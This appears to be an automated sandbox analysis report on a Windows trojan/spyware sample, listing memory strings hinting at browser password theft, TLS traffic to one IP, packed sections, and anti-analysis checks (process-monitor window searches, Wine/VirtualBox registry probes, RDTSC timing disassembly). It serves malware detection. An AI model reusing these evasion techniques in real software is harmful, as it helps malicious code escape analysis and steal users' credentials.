              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49758 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: 661fW9gxDp.exeStatic PE information: section name:
              Source: 661fW9gxDp.exeStatic PE information: section name: .idata
              Source: 661fW9gxDp.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00C6E6DC0_3_00C6E6DC
              Source: 661fW9gxDp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 661fW9gxDp.exeStatic PE information: Section: ZLIB complexity 0.9974114404965754
              Source: 661fW9gxDp.exeStatic PE information: Section: hjbgbzbr ZLIB complexity 0.9944742018026276
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: C:\Users\user\Desktop\661fW9gxDp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 661fW9gxDp.exe, 00000000.00000003.1424757063.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424463548.00000000058A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 661fW9gxDp.exeVirustotal: Detection: 50%
              Source: 661fW9gxDp.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile read: C:\Users\user\Desktop\661fW9gxDp.exeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 661fW9gxDp.exeStatic file information: File size 1841664 > 1048576
              Source: 661fW9gxDp.exeStatic PE information: Raw size of hjbgbzbr is bigger than: 0x100000 < 0x199200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeUnpacked PE file: 0.2.661fW9gxDp.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hjbgbzbr:EW;ijeloniv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hjbgbzbr:EW;ijeloniv:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: 661fW9gxDp.exeStatic PE information: real checksum: 0x1c3d39 should be: 0x1c9e3b
              Source: 661fW9gxDp.exeStatic PE information: section name:
              Source: 661fW9gxDp.exeStatic PE information: section name: .idata
              Source: 661fW9gxDp.exeStatic PE information: section name:
              Source: 661fW9gxDp.exeStatic PE information: section name: hjbgbzbr
              Source: 661fW9gxDp.exeStatic PE information: section name: ijeloniv
              Source: 661fW9gxDp.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55C3 push ebp; iretd 0_3_00CF55C6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55C3 push ebp; iretd 0_3_00CF55C6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55C3 push ebp; iretd 0_3_00CF55C6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55C3 push ebp; iretd 0_3_00CF55C6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52E0 push edx; iretd 0_3_00CF52F2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52E0 push edx; iretd 0_3_00CF52F2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52E0 push edx; iretd 0_3_00CF52F2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52E0 push edx; iretd 0_3_00CF52F2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52FB push edx; iretd 0_3_00CF52FE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52FB push edx; iretd 0_3_00CF52FE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52FB push edx; iretd 0_3_00CF52FE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52FB push edx; iretd 0_3_00CF52FE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF54F8 push ebp; iretd 0_3_00CF550E
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF54F8 push ebp; iretd 0_3_00CF550E
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF54F8 push ebp; iretd 0_3_00CF550E
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF54F8 push ebp; iretd 0_3_00CF550E
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F7 push edx; iretd 0_3_00CF52FA
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F7 push edx; iretd 0_3_00CF52FA
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F7 push edx; iretd 0_3_00CF52FA
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F7 push edx; iretd 0_3_00CF52FA
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F3 push edx; iretd 0_3_00CF52F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F3 push edx; iretd 0_3_00CF52F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F3 push edx; iretd 0_3_00CF52F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF52F3 push edx; iretd 0_3_00CF52F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55F3 push ebp; iretd 0_3_00CF55F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55F3 push ebp; iretd 0_3_00CF55F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55F3 push ebp; iretd 0_3_00CF55F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF55F3 push ebp; iretd 0_3_00CF55F6
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF5488 push ebp; iretd 0_3_00CF54A2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF5488 push ebp; iretd 0_3_00CF54A2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeCode function: 0_3_00CF5488 push ebp; iretd 0_3_00CF54A2
              Source: 661fW9gxDp.exeStatic PE information: section name: entropy: 7.97782039480764
              Source: 661fW9gxDp.exeStatic PE information: section name: hjbgbzbr entropy: 7.9528967637667956

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: E085D5 second address: E085DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: E085DB second address: E07EB6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d clc 0x0000000e push dword ptr [ebp+122D0AA5h] 0x00000014 cld 0x00000015 call dword ptr [ebp+122D29CCh] 0x0000001b pushad 0x0000001c stc 0x0000001d xor eax, eax 0x0000001f jl 00007F646C53F7B8h 0x00000025 jmp 00007F646C53F7B2h 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e mov dword ptr [ebp+122D3451h], esi 0x00000034 sub dword ptr [ebp+122D3451h], edx 0x0000003a mov dword ptr [ebp+122D3AE0h], eax 0x00000040 cld 0x00000041 mov esi, 0000003Ch 0x00000046 clc 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b jmp 00007F646C53F7AAh 0x00000050 lodsw 0x00000052 mov dword ptr [ebp+122D24F3h], esi 0x00000058 add eax, dword ptr [esp+24h] 0x0000005c cmc 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jnl 00007F646C53F7ACh 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a jl 00007F646C53F7A6h 0x00000070 pop eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7ADDA second address: F7ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F646CD14776h 0x0000000d jmp 00007F646CD14784h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7ADFB second address: F7AE18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F646C53F7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7AE18 second address: F7AE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7AE1E second address: F7AE24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F79F0A second address: F79F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F646CD14786h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F79F27 second address: F79F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F646C53F7A6h 0x00000009 jmp 00007F646C53F7B7h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F79F4E second address: F79F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F79F54 second address: F79F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F79F58 second address: F79F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7A245 second address: F7A24A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7A37E second address: F7A393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F646CD1477Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7A393 second address: F7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D8C7 second address: F7D8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D8CD second address: F7D8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D8D1 second address: F7D8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F646CD14776h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D8E5 second address: F7D8EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D8EB second address: F7D915 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F646CD1477Ch 0x00000008 jp 00007F646CD14776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F646CD14784h 0x0000001c jmp 00007F646CD1477Eh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D915 second address: F7D9B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F646C53F7B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f or edx, 618CC1B1h 0x00000015 or edx, dword ptr [ebp+122D3D98h] 0x0000001b popad 0x0000001c push 00000003h 0x0000001e call 00007F646C53F7B9h 0x00000023 mov ecx, edx 0x00000025 pop esi 0x00000026 mov edx, 23307816h 0x0000002b push 00000000h 0x0000002d mov ch, bh 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F646C53F7A8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b xor ecx, dword ptr [ebp+122D2352h] 0x00000051 call 00007F646C53F7A9h 0x00000056 jmp 00007F646C53F7B4h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7D9B2 second address: F7D9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14782h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DAC9 second address: F7DAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F646C53F7AEh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DAE0 second address: F7DAF8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007F646CD14780h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DAF8 second address: F7DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c je 00007F646C53F7A6h 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DB0B second address: F7DB43 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F646CD14787h 0x00000016 jmp 00007F646CD1477Dh 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DB43 second address: F7DBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+122D3DECh] 0x00000010 push 00000003h 0x00000012 mov edi, 53A301D0h 0x00000017 push 00000000h 0x00000019 mov ch, bl 0x0000001b jmp 00007F646C53F7AEh 0x00000020 push 00000003h 0x00000022 mov esi, 34E96CBFh 0x00000027 call 00007F646C53F7A9h 0x0000002c jmp 00007F646C53F7ADh 0x00000031 push eax 0x00000032 pushad 0x00000033 je 00007F646C53F7ACh 0x00000039 jo 00007F646C53F7A6h 0x0000003f pushad 0x00000040 jmp 00007F646C53F7B6h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e jmp 00007F646C53F7ABh 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 pop edx 0x00000057 popad 0x00000058 mov eax, dword ptr [eax] 0x0000005a push edx 0x0000005b ja 00007F646C53F7ACh 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 jp 00007F646C53F7A6h 0x0000006f pushad 0x00000070 popad 0x00000071 popad 0x00000072 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DBF4 second address: F7DBF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DBF9 second address: F7DBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DCB2 second address: F7DCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DCB6 second address: F7DCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DCBA second address: F7DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F646CD14784h 0x0000000d sbb dx, 7500h 0x00000012 push 00000000h 0x00000014 jmp 00007F646CD14783h 0x00000019 call 00007F646CD14779h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F646CD14785h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DD11 second address: F7DD34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F646C53F7A6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DD34 second address: F7DD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DD38 second address: F7DD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
